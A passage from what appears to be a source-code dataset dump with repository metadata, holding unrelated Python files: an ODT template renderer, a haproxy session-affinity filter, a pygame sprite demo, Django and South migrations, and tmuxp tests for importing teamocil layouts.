fileBuffer = FileBuffer(env, os.path.join(self.tempFolder,odtFile))
env.currentBuffer = fileBuffer
return PodParser(env, self)
def renderXhtml(self, xhtmlString, encoding='utf-8', stylesMapping={}):
'''Method that can be used (under the name 'xhtml') into a pod template
for converting a chunk of XHTML content (p_xhtmlString) into a chunk
of ODT content.'''
stylesMapping = self.stylesManager.checkStylesMapping(stylesMapping)
ns = self.currentParser.env.namespaces
# xhtmlString is only a chunk of XHTML. So we must surround it a tag in
# order to get a XML-compliant file (we need a root tag)
xhtmlContent = '<podXhtml>%s</podXhtml>' % xhtmlString
return Xhtml2OdtConverter(xhtmlContent, encoding, self.stylesManager,
stylesMapping, ns).run()
def evalIfExpression(self, condition, ifTrue, ifFalse):
'''This method implements the method 'test' which is proposed in the
default pod context. It represents an 'if' expression (as opposed to
the 'if' statement): depending on p_condition, expression result is
p_ifTrue or p_ifFalse.'''
if condition:
return ifTrue
return ifFalse
imageFormats = ('png', 'jpeg', 'jpg', 'gif')
ooFormats = ('odt',)
def importDocument(self, content=None, at=None, format=None,
anchor='as-char'):
'''If p_at is not None, it represents a path or url allowing to find
the document. If p_at is None, the content of the document is
supposed to be in binary format in p_content. The document
p_format may be: odt or any format in imageFormats. p_anchor is only
relevant for images.'''
ns = self.currentParser.env.namespaces
importer = None
# Is there someting to import?
if not content and not at:
raise PodError(DOC_NOT_SPECIFIED)
# Guess document format
if not format:
# It should be deduced from p_at
if not at:
raise PodError(DOC_FORMAT_ERROR)
format = os.path.splitext(at)[1][1:]
else:
# If format is a mimeType, convert it to an extension
if mimeTypesExts.has_key(format):
format = mimeTypesExts[format]
isImage = False
if format in self.ooFormats:
importer = OdtImporter
self.forceOoCall = True
elif format in self.imageFormats:
importer = ImageImporter
isImage = True
elif format == 'pdf':
importer = PdfImporter
else:
raise PodError(DOC_WRONG_FORMAT % format)
imp = importer(content, at, format, self.tempFolder, ns)
if isImage:
imp.setAnchor(anchor)
res = imp.run()
if imp.fileNames:
self.fileNames += imp.fileNames
return res
def prepareFolders(self):
# Check if I can write the result
if os.path.exists(self.result):
raise PodError(RESULT_FILE_EXISTS % self.result)
try:
f = open(self.result, 'w')
f.write('Hello')
f.close()
except OSError, oe:
raise PodError(CANT_WRITE_RESULT % (self.result, oe))
except IOError, ie:
raise PodError(CANT_WRITE_RESULT % (self.result, ie))
self.result = os.path.abspath(self.result)
os.remove(self.result)
# Check that temp folder does not exist
self.tempFolder = os.path.abspath(self.result) + '.temp'
if os.path.exists(self.tempFolder):
raise PodError(TEMP_FOLDER_EXISTS % self.tempFolder)
try:
os.mkdir(self.tempFolder)
except OSError, oe:
raise PodError(CANT_WRITE_TEMP_FOLDER % (self.result, oe))
def patchManifest(self):
'''Declares, in META-INF/manifest.xml, images or files included via the
"do... from document" statements if any.'''
if self.fileNames:
j = os.path.join
toInsert = ''
for fileName in self.fileNames:
mimeType = mimetypes.guess_type(fileName)[0]
toInsert += ' <manifest:file-entry manifest:media-type="%s" ' \
'manifest:full-path="%s"/>\n' % (mimeType, fileName)
manifestName = j(self.unzipFolder, j('META-INF', 'manifest.xml'))
f = file(manifestName)
manifestContent = f.read()
hook = '</manifest:manifest>'
manifestContent = manifestContent.replace(hook, toInsert+hook)
f.close()
# Write the new manifest content
f = file(manifestName, 'w')
f.write(manifestContent)
f.close()
# Public interface
def run(self):
'''Renders the result.'''
# Remember which parser is running
self.currentParser = self.contentParser
# Create the resulting content.xml
self.currentParser.parse(self.contentXml)
self.currentParser = self.stylesParser
# Create the resulting styles.xml
self.currentParser.parse(self.stylesXml)
# Patch META-INF/manifest.xml
self.patchManifest()
# Re-zip the result
self.finalize()
def getStyles(self):
'''Returns a dict of the styles that are defined into the template.'''
return self.stylesManager.styles
def setStylesMapping(self, stylesMapping):
'''Establishes a correspondance between, on one hand, CSS styles or
XHTML tags that will be found inside XHTML content given to POD,
and, on the other hand, ODT styles found into the template.'''
try:
stylesMapping = self.stylesManager.checkStylesMapping(stylesMapping)
self.stylesManager.stylesMapping = stylesMapping
except PodError, po:
self.contentParser.env.currentBuffer.content.close()
self.stylesParser.env.currentBuffer.content.close()
if os.path.exists(self.tempFolder):
FolderDeleter.delete(self.tempFolder)
raise po
def reportProblem(self, msg, resultType):
'''When trying to call OO in server mode for producing ODT
(=forceOoCall=True), if an error occurs we still have an ODT to
return to the user. So we produce a warning instead of raising an
error.'''
if (resultType == 'odt') and self.forceOoCall:
print WARNING_INCOMPLETE_ODT % msg
else:
raise msg
def callOpenOffice(self, resultOdtName, resultType):
'''Call Open Office in server mode to convert or update the ODT
result.'''
ooOutput = ''
try:
if (not isinstance(self.ooPort, int)) and \
(not isinstance(self.ooPort, long)):
raise PodError(BAD_OO_PORT % str(self.ooPort))
try:
from appy.pod.converter import Converter, ConverterError
try:
Converter(resultOdtName, resultType,
self.ooPort).run()
except ConverterError, ce:
raise PodError(CONVERT_ERROR % str(ce))
except ImportError:
# I do not have UNO. So try to launch a UNO-enabled Python
# interpreter which should be in self.pyPath.
if not self.pyPath:
raise PodError(NO_PY_PATH % resultType)
if self.pyPath.find(' ') != -1:
raise PodError(BLANKS_IN_PATH % self.pyPath)
if not os.path.isfile(self.pyPath):
raise PodError(PY_PATH_NOT_FILE % self.pyPath)
if resultOdtName.find(' ') != -1:
qResultOdtName = '"%s"' % resultOdtName
else:
qResultOdtName = resultOdtName
convScript = '%s/converter.py' % \
os.path.dirname(appy.pod.__file__)
if convScript.find(' ') != -1:
convScript = '"%s"' % convScript
cmd = '%s %s %s %s -p%d' % \
(self.pyPath, convScript, qResultOdtName, resultType,
self.ooPort)
ooOutput = executeCommand(cmd)
except PodError, pe:
# When trying to call OO in server mode for producing
# ODT (=forceOoCall=True), if an error occurs we still
# have an ODT to return to the user. So we produce a
# warning instead of raising an error.
if (resultType == 'odt') and self.forceOoCall:
print WARNING_INCOMPLETE_ODT % str(pe)
else:
raise pe
return ooOutput
def finalize(self):
'''Re-zip the result and potentially call OpenOffice if target format is
not ODT or if forceOoCall is True.'''
for odtFile in ('content.xml', 'styles.xml'):
shutil.copy(os.path.join(self.tempFolder, odtFile),
os.path.join(self.unzipFolder, odtFile))
if self.finalizeFunction:
try:
self.finalizeFunction(self.unzipFolder)
except Exception, e:
print WARNING_FINALIZE_ERROR % str(e)
resultOdtName = os.path.join(self.tempFolder, 'result.odt')
try:
resultOdt = zipfile.ZipFile(resultOdtName,'w', zipfile.ZIP_DEFLATED)
except RuntimeError:
resultOdt = zipfile.ZipFile(resultOdtName,'w')
for dir, dirnames, filenames in os.walk(self.unzipFolder):
for f in filenames:
folderName = dir[len(self.unzipFolder)+1:]
resultOdt.write(os.path.join(dir, f),
os.path.join(folderName, f))
if not dirnames and not filenames:
# This is an empty leaf folder. We must create an entry in the
# zip for him
folderName = dir[len(self.unzipFolder):]
zInfo = zipfile.ZipInfo("%s/" % folderName,time.localtime()[:6])
zInfo.external_attr = 48
resultOdt.writestr(zInfo, '')
resultOdt.close()
resultType = os.path.splitext(self.result)[1]
try:
if (resultType == '.odt') and not self.forceOoCall:
# Simply move the ODT result to the result
os.rename(resultOdtName, self.result)
else:
if resultType.startswith('.'): resultType = resultType[1:]
if not resultType in FILE_TYPES.keys():
raise PodError(BAD_RESULT_TYPE % (
self.result, FILE_TYPES.keys()))
# Call OpenOffice to perform the conversion or document update
output = self.callOpenOffice(resultOdtName, resultType)
# I (should) have the result. Move it to the correct name
resPrefix = os.path.splitext(resultOdtName)[0] + '.'
if resultType == 'odt':
# converter.py has (normally!) created a second file
# suffixed .res.odt
resultName = resPrefix + 'res.odt'
if not os.path.exists(resultName):
resultName = resultOdtName
# In this case OO in server mode could not be called to
# update indexes, sections, etc.
else:
resultName = resPrefix + resultType
if not os.path.exists(resultName):
raise PodError(CONVERT_ERROR % output)
os.rename(resultName, self.result)
finally:
FolderDeleter.delete(self.tempFolder)
# ------------------------------------------------------------------------------
| [
"[email protected]"
]
| |
b942645e69d7dd1d7dcbcdb08855353708ff84f2 | 600df3590cce1fe49b9a96e9ca5b5242884a2a70 | /components/autofill/content/common/DEPS | c3505fa54c3ecf8453d1bfdeff494e6ca31545ae | [
"BSD-3-Clause"
]
| permissive | metux/chromium-suckless | efd087ba4f4070a6caac5bfbfb0f7a4e2f3c438a | 72a05af97787001756bae2511b7985e61498c965 | refs/heads/orig | 2022-12-04T23:53:58.681218 | 2017-04-30T10:59:06 | 2017-04-30T23:35:58 | 89,884,931 | 5 | 3 | BSD-3-Clause | 2022-11-23T20:52:53 | 2017-05-01T00:09:08 | null | UTF-8 | Python | false | false | 58 | include_rules = [
"+content/public/common",
"+ipc",
]
| [
"[email protected]"
]
| ||
542816beffb8b703f3ac06dfc3663090ffee2d00 | b129c9b11e9d2c06114f45ce03a94f4f2a177119 | /hugin/haproxy/filters/userstate.py | c25adced17d38446916ca97be7ca2a70eced1dc0 | []
| no_license | pyfidelity/hugin.haproxy | a9e48e345b03ed9d361c0d6c8617135378f5c311 | 444e30350936883e7749c2371f394fa82c1644fe | refs/heads/master | 2016-09-01T17:29:48.210244 | 2014-11-24T12:34:51 | 2014-11-24T12:34:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,529 | py | # Userstate is about detecting when users switch backend node when session affinity is used.
import re
from hugin.haproxy import registerFilter
from collections import deque
COOKIEMATCH = re.compile('.*="?(?P<cookie>\S+)')
class UserState(object):
def __init__(self):
self.duplicates = 0 # Redundant reloads where user press stop or reload
self.redispatch = 0 # Session affinity redispatch
self.affinity = 0 # Session affinity where previous 4 request were to the same instance
self.status = {} # Keep track of last 4 requests for each uid
def process(self, data):
#match = COOKIEMATCH.match(data['reqcookie'])
#if match:
# uid = match.group('cookie')
reqcookie = data.get('reqcookie', None)
if reqcookie is not None and len(reqcookie) > 1:
uid = reqcookie[6:] # __ac="cookieval...
hist = self.status.get(uid, deque(maxlen=4)) # We keep track of the 4 last requests
previous = hist and hist[0]
instance = data['instance']
if previous:
# Detect redundant reloads - C is client abort
if previous['terminationevent'] == 'C' and previous['url'] == data['url']:
self.duplicates += 1
# Check for session affinity
if previous['instance'] == instance:
for item in hist:
if item['instance'] != instance:
break # Different instance, no affinity
self.affinity += 1
# We only check for redispatch or affinity if we have a full history
elif len(hist) == 4:
# Check for redispatch
instances = set([h['instance'] for h in hist])
if len(instances) == 1:
self.redispatch += 1
hist.appendleft(dict(url=data['url'],
terminationevent=data['terminationevent'],
instance=instance,))
self.status[uid] = hist
return data
def stats(self, reset=True, count=20):
duplicates, redispatch, affinity = self.duplicates, self.redispatch, self.affinity
if reset:
self.duplicates = self.redispatch = self.affinity = 0
return dict(duplicates=duplicates,
redispatch=redispatch,
affinity=affinity)
registerFilter('userstate', UserState())
| [
"[email protected]"
]
| |
0535d5b25645641c17f7429e27beadf5cbf303d1 | 1b6fd0e1da9aa6d28b19540887ffcb5233ac3692 | /Resources/RP01/P01.3/sprites_001.py | 8bd0fb678689dd03c92fa1ffe7d2cdabc160fd01 | []
| no_license | rugbyprof/4443-2D-PyGame | a637cd1237f90ca30a484d9fb2b6738571777d8c | bba26f794bd85599cf0598c1c64feec59fa31246 | refs/heads/master | 2022-11-27T14:14:54.982351 | 2020-08-05T19:32:45 | 2020-08-05T19:32:45 | 271,365,653 | 3 | 5 | null | null | null | null | UTF-8 | Python | false | false | 6,735 | py | """
Sprite Helper
Description:
Loading a sprite animation and displaying it.
Problems using a single instance of image.
"""
# Import and initialize the pygame library
import pygame
import random
import json
import pprint
import sys
import os
import math
import glob
from helper_module import rgb_colors
from helper_module import mykwargs
from helper_module import straightDistance
from helper_module import getCardinalDirection
# Import pygame.locals for easier access to key coordinates
# Updated to conform to flake8 and black standards
from pygame.locals import (
K_UP,
K_DOWN,
K_LEFT,
K_RIGHT,
K_ESCAPE,
KEYDOWN,
QUIT,
)
# Keep up with the config stuff. Adding sprite sheets for
# characters and other graphics now
config = {
'title' :'P01.3 Pygame Sprite Movement',
'window_size' : {
'width' : 640,
'height' : 480
},
'sprite_sheets':{
'explosion_01':{'path':'./media/fx/explosion_01'},
'green_monster':{'path':'./media/characters/green_monster'}
},
'background':'./media/backgrounds/tile_1000x1000_40_light.png',
'fps':60
}
colors = rgb_colors('colors.json')
def LoadSpriteImages(path):
""" Load sprite images into either a dictionary of moves or a list of images depending
on whether the "sprite" is a multi move character or a single effect with just frames
to play.
This method reads a json file looking for the following formats (right now):
"""
if not os.path.isdir(path):
print(f"Error: {path} not a valid sprite folder!")
sys.exit()
if not os.path.isfile(os.path.join(path,"moves.json")):
print(f"Error: 'moves.json' is required to be in folder!")
sys.exit()
# open the json file thats expected to be in the folder
# and read it in as a string
f = open(os.path.join(path,"moves.json"),"r")
# make raw string into a python dictionary
sprite_info = json.loads(f.read())
# base name is used to build filename
base_name = sprite_info['base_name']
# ext as well
ext = sprite_info['ext']
# If moves is a key in the dictionary then we create a dictionary of
# of moves where each move points to a list of images for that move
if 'moves' in sprite_info:
moves = {}
for move,nums in sprite_info['moves'].items():
images = []
for num in nums:
images.append(os.path.join(path,base_name+num+ext))
moves[move] = images
return moves
# If frames in the dictionary, then its an effect with a list of images
# for that effect. We need to order them before return since glob
# doesn't get directory items in order.
elif 'frames' in sprite_info:
images = sprite_info['frames']
if type(images) == list:
pass
elif type(images) == str and images == '*':
images = glob.glob(os.path.join(path,'*'+ext))
images.sort()
return images
else:
print(f"Error: 'moves' or 'frames' key not in json!!")
sys.exit()
class Explosion(pygame.sprite.Sprite):
def __init__(self, **kwargs):
# Initiate this sprite
pygame.sprite.Sprite.__init__(self)
# get location of sprites for this animation
fx_sprites = kwargs.get('fx_sprites',None)
# if not throw error
if not fx_sprites:
print("Error: Need location of fx_sprites!")
sys.exit(0)
self.center = kwargs.get('loc',(0,0))
# This function finds the json file and loads all the
# image names into a list
self.images = LoadSpriteImages(fx_sprites)
# container for all the pygame images
self.frames = []
# load images and "convert" them. (see link at top for explanation)
for image in self.images:
self.frames.append(pygame.image.load(image))
# animation variables
self.frame = 0
self.last_update = pygame.time.get_ticks()
self.frame_rate = 0 # smaller = faster
# prime the animation
self.image = self.frames[0]
self.rect = self.image.get_rect()
self.rect.center = self.center
def setLocation(self,loc):
""" Set the center of the explosion
"""
self.center = loc
self.rect.center = loc
def update(self):
""" Overloaded method from sprite which gets called by the game loop when
a sprite group gets updated
"""
now = pygame.time.get_ticks() # get current game clock
if now - self.last_update > self.frame_rate: #
self.last_update = now
self.frame += 1
if self.frame == len(self.frames):
self.kill()
self.frame = 0
else:
center = self.rect.center
self.image = self.frames[self.frame]
self.rect = self.image.get_rect()
self.rect.center = center
def main():
pygame.init()
# sets the window title
pygame.display.set_caption(config['title'])
# Game size of game window from config
width = config['window_size']['width']
height = config['window_size']['height']
# Set up the drawing window
screen = pygame.display.set_mode((width,height))
# load our background
background = pygame.image.load(config['background'])
# sprite group to handle all the visuals
all_sprites = pygame.sprite.Group()
# help control event timing
clock = pygame.time.Clock()
e = Explosion(fx_sprites=config['sprite_sheets']['explosion_01']['path'])
# Run until the user asks to quit
# game loop
running = True
while running:
clock.tick(config['fps'])
# fill screen with white
screen.fill(colors['white'])
# show background grid (no moving it)
screen.blit(background, (0,0))
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
if event.type == pygame.KEYDOWN:
event.key
if event.type == pygame.KEYUP:
event.key
if event.type == pygame.MOUSEMOTION:
pass
if event.type == pygame.MOUSEBUTTONUP:
print(pygame.mouse.get_pos())
e.setLocation(pygame.mouse.get_pos())
all_sprites.add(e)
all_sprites.update()
all_sprites.draw(screen)
pygame.display.flip()
# Done! Time to quit.
pygame.quit()
if __name__=='__main__':
main()
| [
"[email protected]"
]
| |
a90e6404551b5912048b4829a5294fbb441ab70e | 93a95c5b9411960b394cfb63e400910d7d1abf50 | /estoque/migrations/0002_auto_20210510_1515.py | ea13d302de4b62141beacc1712e501fe83515d36 | [
"MIT"
]
| permissive | jonathan-mothe/estoque | 9377e4ac826fabe9d1a4f66f817204334a59a311 | de8d0ea87e67e93ad4922a2d81b1ba7d68a29845 | refs/heads/master | 2023-04-21T19:08:07.579886 | 2021-05-11T17:46:31 | 2021-05-11T17:46:31 | 364,916,799 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,283 | py | # Generated by Django 3.2.2 on 2021-05-10 18:15
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('estoque', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='EstoqueEntrada',
fields=[
],
options={
'verbose_name': 'estoque estrada',
'verbose_name_plural': 'estoque entrada',
'proxy': True,
'indexes': [],
'constraints': [],
},
bases=('estoque.estoque',),
),
migrations.CreateModel(
name='EstoqueSaida',
fields=[
],
options={
'verbose_name': 'estoque saída',
'verbose_name_plural': 'estoque saída',
'proxy': True,
'indexes': [],
'constraints': [],
},
bases=('estoque.estoque',),
),
migrations.AlterField(
model_name='estoqueitens',
name='estoque',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='estoques', to='estoque.estoque'),
),
]
| [
"[email protected]"
]
| |
8384c25f0bd13dd9db7d550b2dcd676408c0460e | d5cc5b93483f3e13b13cb0580a1994583c70ebb8 | /tmuxp/testsuite/test_config_teamocil.py | 184d205016b1244ea37d8ce4677b4cf7cdbec981 | [
"BSD-3-Clause"
]
| permissive | GoodDingo/tmuxp | b07293e3090760283f7e733fd538410f36f8bea7 | 23594fdae5473aaa31c33dae64ace59001847f9e | refs/heads/master | 2020-12-11T07:38:36.346464 | 2013-12-25T03:29:06 | 2013-12-25T03:29:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,985 | py | # -*- coding: utf-8 -*-
"""Test for tmuxp teamocil configuration..
tmuxp.tests.test_config_teamocil
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: Copyright 2013 Tony Narlock.
:license: BSD, see LICENSE for details
"""
from __future__ import absolute_import, division, print_function, \
with_statement, unicode_literals
import os
import logging
import kaptan
from .. import config, exc
from ..util import tmux
from .helpers import TestCase
logger = logging.getLogger(__name__)
TMUXP_DIR = os.path.join(os.path.dirname(__file__), '.tmuxp')
class TeamocilTest(TestCase):
teamocil_yaml = """\
windows:
- name: "sample-two-panes"
root: "~/Code/sample/www"
layout: even-horizontal
panes:
- cmd: ["pwd", "ls -la"]
- cmd: "rails server --port 3000"
"""
teamocil_dict = {
'windows': [{
'name': 'sample-two-panes',
'root': '~/Code/sample/www',
'layout': 'even-horizontal',
'panes': [
{
'cmd': [
'pwd',
'ls -la'
]
},
{
'cmd': 'rails server --port 3000'
}
]
}]
}
tmuxp_dict = {
'session_name': None,
'windows': [
{
'window_name': 'sample-two-panes',
'layout': 'even-horizontal',
'start_directory': '~/Code/sample/www',
'panes': [
{
'shell_command': [
'pwd',
'ls -la'
]
},
{
'shell_command': 'rails server --port 3000'
}
]
}
]
}
def test_config_to_dict(self):
configparser = kaptan.Kaptan(handler='yaml')
test_config = configparser.import_config(self.teamocil_yaml)
yaml_to_dict = test_config.get()
self.assertDictEqual(yaml_to_dict, self.teamocil_dict)
self.assertDictEqual(
config.import_teamocil(self.teamocil_dict),
self.tmuxp_dict
)
config.validate_schema(
config.import_teamocil(
self.teamocil_dict
)
)
class Teamocil2Test(TestCase):
teamocil_yaml = """\
windows:
- name: "sample-four-panes"
root: "~/Code/sample/www"
layout: tiled
panes:
- cmd: "pwd"
- cmd: "pwd"
- cmd: "pwd"
- cmd: "pwd"
"""
teamocil_dict = {
'windows': [{
'name': 'sample-four-panes',
'root': '~/Code/sample/www',
'layout': 'tiled',
'panes': [
{'cmd': 'pwd'},
{'cmd': 'pwd'},
{'cmd': 'pwd'},
{'cmd': 'pwd'},
]
}]
}
tmuxp_dict = {
'session_name': None,
'windows': [
{
'window_name': 'sample-four-panes',
'layout': 'tiled',
'start_directory': '~/Code/sample/www',
'panes': [
{
'shell_command': 'pwd'
},
{
'shell_command': 'pwd'
},
{
'shell_command': 'pwd'
},
{
'shell_command': 'pwd'
},
]
}
]
}
def test_config_to_dict(self):
configparser = kaptan.Kaptan(handler='yaml')
test_config = configparser.import_config(self.teamocil_yaml)
yaml_to_dict = test_config.get()
self.assertDictEqual(yaml_to_dict, self.teamocil_dict)
self.assertDictEqual(
config.import_teamocil(self.teamocil_dict),
self.tmuxp_dict
)
config.validate_schema(
config.import_teamocil(
self.teamocil_dict
)
)
class Teamocil3Test(TestCase):
teamocil_yaml = """\
windows:
- name: "my-first-window"
root: "~/Projects/foo-www"
layout: even-vertical
filters:
before: "rbenv local 2.0.0-p0"
after: "echo 'I am done initializing this pane.'"
panes:
- cmd: "git status"
- cmd: "bundle exec rails server --port 4000"
focus: true
- cmd:
- "sudo service memcached start"
- "sudo service mongodb start"
"""
teamocil_dict = {
'windows': [{
'name': 'my-first-window',
'root': '~/Projects/foo-www',
'layout': 'even-vertical',
'filters': {
'before': 'rbenv local 2.0.0-p0',
'after': 'echo \'I am done initializing this pane.\''
},
'panes': [
{'cmd': 'git status'},
{'cmd': 'bundle exec rails server --port 4000',
'focus': True},
{'cmd': [
'sudo service memcached start',
'sudo service mongodb start',
]}
]
}]
}
tmuxp_dict = {
'session_name': None,
'windows': [
{
'window_name': 'my-first-window',
'layout': 'even-vertical',
'start_directory': "~/Projects/foo-www",
'shell_command_before': 'rbenv local 2.0.0-p0',
'shell_command_after': (
'echo '
'\'I am done initializing this pane.\''
),
'panes': [
{
'shell_command': 'git status'
},
{
'shell_command': 'bundle exec rails server --port 4000',
'focus': True
},
{
'shell_command': [
'sudo service memcached start',
'sudo service mongodb start'
]
}
]
}
]
}
def test_config_to_dict(self):
self.maxDiff = None
configparser = kaptan.Kaptan(handler='yaml')
test_config = configparser.import_config(self.teamocil_yaml)
yaml_to_dict = test_config.get()
self.assertDictEqual(yaml_to_dict, self.teamocil_dict)
self.assertDictEqual(
config.import_teamocil(self.teamocil_dict),
self.tmuxp_dict
)
config.validate_schema(
config.import_teamocil(
self.teamocil_dict
)
)
class Teamocil4Test(TestCase):
teamocil_yaml = """\
windows:
- name: "erb-example"
root: <%= ENV['MY_PROJECT_ROOT'] %>
panes:
- cmd: "pwd"
"""
teamocil_dict = {
'windows': [{
'name': 'erb-example',
'root': "<%= ENV['MY_PROJECT_ROOT'] %>",
'panes': [
{'cmd': 'pwd'}
]
}]
}
tmuxp_dict = {
'session_name': None,
'windows': [
{
'window_name': 'erb-example',
'start_directory': "<%= ENV['MY_PROJECT_ROOT'] %>",
'panes': [
{
'shell_command': 'pwd'
}
]
}
]
}
def test_config_to_dict(self):
self.maxDiff = None
configparser = kaptan.Kaptan(handler='yaml')
test_config = configparser.import_config(self.teamocil_yaml)
yaml_to_dict = test_config.get()
self.assertDictEqual(yaml_to_dict, self.teamocil_dict)
self.assertDictEqual(
config.import_teamocil(self.teamocil_dict),
self.tmuxp_dict
)
config.validate_schema(
config.import_teamocil(
self.teamocil_dict
)
)
class TeamocilLayoutsTest(TestCase):
"""Import configurations from teamocil's <fixtures/layout.yml>.
https://github.com/remiprev/teamocil/blob/master/spec/fixtures/layouts.yml
LICENSE: https://github.com/remiprev/teamocil/blob/master/LICENSE
"""
teamocil_yaml = """\
# Simple two windows layout
two-windows:
windows:
- name: "foo"
clear: true
root: "/foo"
layout: "tiled"
panes:
- cmd: "echo 'foo'"
- cmd: "echo 'foo again'"
- name: "bar"
root: "/bar"
splits:
- cmd:
- "echo 'bar'"
- "echo 'bar in an array'"
target: bottom-right
- cmd: "echo 'bar again'"
focus: true
width: 50
# Simple two windows layout with filters
two-windows-with-filters:
windows:
- name: "foo"
root: "/foo"
filters:
before:
- "echo first before filter"
- "echo second before filter"
after:
- "echo first after filter"
- "echo second after filter"
panes:
- cmd: "echo 'foo'"
- cmd: "echo 'foo again'"
width: 50
two-windows-with-custom-command-options:
windows:
- name: "foo"
cmd_separator: "\n"
with_env_var: false
clear: true
root: "/foo"
layout: "tiled"
panes:
- cmd: "echo 'foo'"
- cmd: "echo 'foo again'"
- name: "bar"
cmd_separator: " && "
with_env_var: true
root: "/bar"
splits:
- cmd:
- "echo 'bar'"
- "echo 'bar in an array'"
target: bottom-right
- cmd: "echo 'bar again'"
focus: true
width: 50
three-windows-within-a-session:
session:
name: "my awesome session"
windows:
- name: "first window"
panes:
- cmd: "echo 'foo'"
- name: "second window"
panes:
- cmd: "echo 'foo'"
- name: "third window"
panes:
- cmd: "echo 'foo'"
"""
teamocil_dict = {
'two-windows': {
'windows': [
{
'name': 'foo',
'clear': True,
'root': '/foo',
'layout': 'tiled',
'panes': [
{
'cmd': "echo 'foo'"
},
{
'cmd': "echo 'foo again'"
}
]
},
{
'name': 'bar',
'root': '/bar',
'splits': [
{
'cmd': [
"echo 'bar'",
"echo 'bar in an array'"
],
'target': 'bottom-right'
},
{
'cmd': "echo 'bar again'",
'focus': True,
'width': 50
}
]
}
]
},
'two-windows-with-filters': {
'windows': [
{
'name': 'foo',
'root': '/foo',
'filters':
{
'before': [
'echo first before filter',
'echo second before filter'
],
'after': [
'echo first after filter',
'echo second after filter',
]
},
'panes': [
{
'cmd': "echo 'foo'"
},
{
'cmd': "echo 'foo again'",
'width': 50
}
]
}
]
},
'two-windows-with-custom-command-options': {
'windows': [
{
'name': 'foo',
'cmd_separator': ' ',
'with_env_var': False,
'clear': True,
'root': '/foo',
'layout': 'tiled',
'panes': [
{
'cmd': "echo 'foo'"
},
{
'cmd': "echo 'foo again'"
}
]
}, {
'name': 'bar',
'cmd_separator': ' && ',
'with_env_var': True,
'root': '/bar',
'splits': [
{
'cmd': [
"echo 'bar'",
"echo 'bar in an array'"
],
'target': 'bottom-right'
},
{
'cmd': "echo 'bar again'",
'focus': True,
'width': 50
}
]
}]
},
'three-windows-within-a-session': {
'session': {
'name': 'my awesome session',
'windows': [
{
'name': 'first window',
'panes': [
{
'cmd': "echo 'foo'"
}
]
}, {
'name': 'second window',
'panes': [
{
'cmd': "echo 'foo'"}
]
}, {
'name': 'third window',
'panes': [
{
'cmd': "echo 'foo'"
}
]
}
]
}
}
}
two_windows = \
{
'session_name': None,
'windows': [
{
'window_name': 'foo',
'start_directory': '/foo',
'clear': True,
'layout': 'tiled',
'panes': [
{
'shell_command': "echo 'foo'"
},
{
'shell_command': "echo 'foo again'"
}
]
},
{
'window_name': 'bar',
'start_directory': '/bar',
'panes': [
{
'shell_command': [
"echo 'bar'",
"echo 'bar in an array'"
],
'target': 'bottom-right'
},
{
'shell_command': "echo 'bar again'",
'focus': True,
}
]
}
]
}
two_windows_with_filters = \
{
'session_name': None,
'windows': [
{
'window_name': 'foo',
'start_directory': '/foo',
'shell_command_before': [
'echo first before filter',
'echo second before filter',
],
'shell_command_after': [
'echo first after filter',
'echo second after filter',
],
'panes': [
{
'shell_command': "echo 'foo'"
},
{
'shell_command': "echo 'foo again'",
}
]
}
]
}
two_windows_with_custom_command_options = \
{
'session_name': None,
'windows': [
{
'window_name': 'foo',
'start_directory': '/foo',
'clear': True,
'layout': 'tiled',
'panes': [
{
'shell_command': "echo 'foo'",
},
{
'shell_command': "echo 'foo again'",
}
]
},
{
'window_name': 'bar',
'start_directory': '/bar',
'panes': [
{
'shell_command': [
"echo 'bar'",
"echo 'bar in an array'"
],
'target': 'bottom-right'
},
{
'shell_command': "echo 'bar again'",
'focus': True,
}
]
}
]
}
three_windows_within_a_session = {
'session_name': 'my awesome session',
'windows': [
{
'window_name': 'first window',
'panes': [
{
'shell_command': "echo 'foo'"
},
]
},
{
'window_name': 'second window',
'panes': [
{
'shell_command': "echo 'foo'"
},
]
},
{
'window_name': 'third window',
'panes': [
{
'shell_command': "echo 'foo'"
},
]
},
]
}
def test_config_to_dict(self):
self.maxDiff = None
configparser = kaptan.Kaptan(handler='yaml')
test_config = configparser.import_config(self.teamocil_yaml)
yaml_to_dict = test_config.get()
self.assertDictEqual(yaml_to_dict, self.teamocil_dict)
self.assertDictEqual(
config.import_teamocil(
self.teamocil_dict['two-windows'],
),
self.two_windows
)
config.validate_schema(
config.import_teamocil(
self.teamocil_dict['two-windows']
)
)
self.assertDictEqual(
config.import_teamocil(
self.teamocil_dict['two-windows-with-filters'],
),
self.two_windows_with_filters
)
config.validate_schema(
config.import_teamocil(
self.teamocil_dict['two-windows-with-filters']
)
)
self.assertDictEqual(
config.import_teamocil(
self.teamocil_dict['two-windows-with-custom-command-options'],
),
self.two_windows_with_custom_command_options
)
config.validate_schema(
config.import_teamocil(
self.teamocil_dict['two-windows-with-custom-command-options']
)
)
self.assertDictEqual(
config.import_teamocil(
self.teamocil_dict['three-windows-within-a-session'],
),
self.three_windows_within_a_session
)
config.validate_schema(
config.import_teamocil(
self.teamocil_dict['three-windows-within-a-session']
)
)
""" this configuration contains multiple sessions in a single file.
tmuxp can split them into files, proceed?
"""
| [
"[email protected]"
]
| |
1fd9d339fb8682ef8a6f21a25cc9fe2d23ae8ca3 | 09bcd2a342fc79a4a7c30e24a76788d90df2176d | /galleria/artists/migrations/0001_initial.py | f3a25b6873d47bb0d9d6a0437de97740b0176461 | [
"Apache-2.0"
]
| permissive | kamalhg/galleria | 48b2ed5ef1931ee12b7247caf7e50caa167c88ff | 18ee38e99869812e61244d62652514d1c46bf3f3 | refs/heads/master | 2020-12-27T12:15:22.233386 | 2014-06-18T15:53:54 | 2014-06-18T15:53:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,628 | py | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Artist'
db.create_table('artists_artist', (
('created', self.gf('model_utils.fields.AutoCreatedField')(default=datetime.datetime.now)),
